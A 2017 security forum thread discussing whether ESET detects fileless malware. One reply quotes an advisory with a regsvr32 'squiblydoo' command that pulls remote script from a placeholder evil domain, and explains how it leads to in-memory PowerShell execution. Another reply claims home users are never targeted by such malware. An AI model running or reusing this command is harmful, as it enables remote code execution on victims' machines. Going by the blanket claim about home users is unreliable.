Wolf Igmc4 6 Posted September 7, 2017 Share Posted September 7, 2017 That's It, I just don't know if Eset can block It. Link to comment Share on other sites More sharing options...
persian-boy 22 Posted September 7, 2017 Share Posted September 7, 2017 Because Eset has memory protection so the answer is yes but it doesn't mean it can detect all of them. Home products are weak against file less malware and I can say home users never target by file less malware because they are designed to target businesses so you don't need protection against file less malware. But if you want to have a reliable protection against these attacks then you need Appguard. APPGUARD+ESET would be a good combo:D Link to comment Share on other sites More sharing options...
Wolf Igmc4 6 Posted September 7, 2017 Author Share Posted September 7, 2017 Well I didnt know about this software, but I think 57$ every year is a bit expensive. Link to comment Share on other sites More sharing options...
itman 1,743 Posted September 8, 2017 Share Posted September 8, 2017 16 hours ago, TomFace said: Shop around....depending on your location, watch for sales (especially seasonal ones). Believe OP was referring to AppGuard. They just recently "jacked up" their yearly subscription costs considerablely. Also you have to agree to auto renewal of the subscription i.e. give credit card details. Thanks but no thanks. Link to comment Share on other sites More sharing options...
Administrators Marcos 5,242 Posted September 8, 2017 Administrators Share Posted September 8, 2017 23 hours ago, Wolf Igmc4 said: That's It, I just don't know if Eset can block It. Yes, ESET is able to detect fileless malware in the registry. Personally I've come across several cases where REG/something was detected in the registry. Link to comment Share on other sites More sharing options...
itman 1,743 Posted September 8, 2017 Share Posted September 8, 2017 (edited) There are a number of characteristics of fileless malware. One of them is the use of the Win registry for persistence purposes. This will allow the malware to reload itself at boot time. However, the established definition of fileless malware is one where the initial attack is performed entirely from memory without every directly downloading anything to the disk. Here is an example of one currently active: https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/codefork-malware/ . As with many of these attacks, the initial infection vector is unknown. In this attack, one example is: Quote A common infection vector most likely was used against most of the targeted organizations. For example, an email attachment with a Microsoft Office document containing a malicious macro. The infection payload launches the following command: regsvr32 /s /u /i:http://xxx.somerandomevildomain.xx/evilpath.xml scrobj.dl I won't get into all the details of the attack other than to discuss the abuse of regsvr32 in this attack. This is an over year old exploit named "squibbedoo" developed by Casey Smith, a security researcher. For starters, it requires admin privileges to run. This implies an escalation of privileges to run; something unfortunately is quite easy to do on Win OSes. What the above command does is establishes a remote connection to the attackers server. Then wscript.exe is run remotely to execute an obfuscated Javascript code that executes Powershell which remotely downloads a PowerShell script and run it from memory. And "we at off and running" as far as the malware attack goes. As far as I am aware of, Eset's HIPS does not monitor regsvr32 execution. I do with a user created HIPS rule. I additionally monitor any inbound/outbound network traffic from it with a user created Eset firewall rule. Edited September 8, 2017 by itman Link to comment Share on other sites More sharing options...
Recommended Posts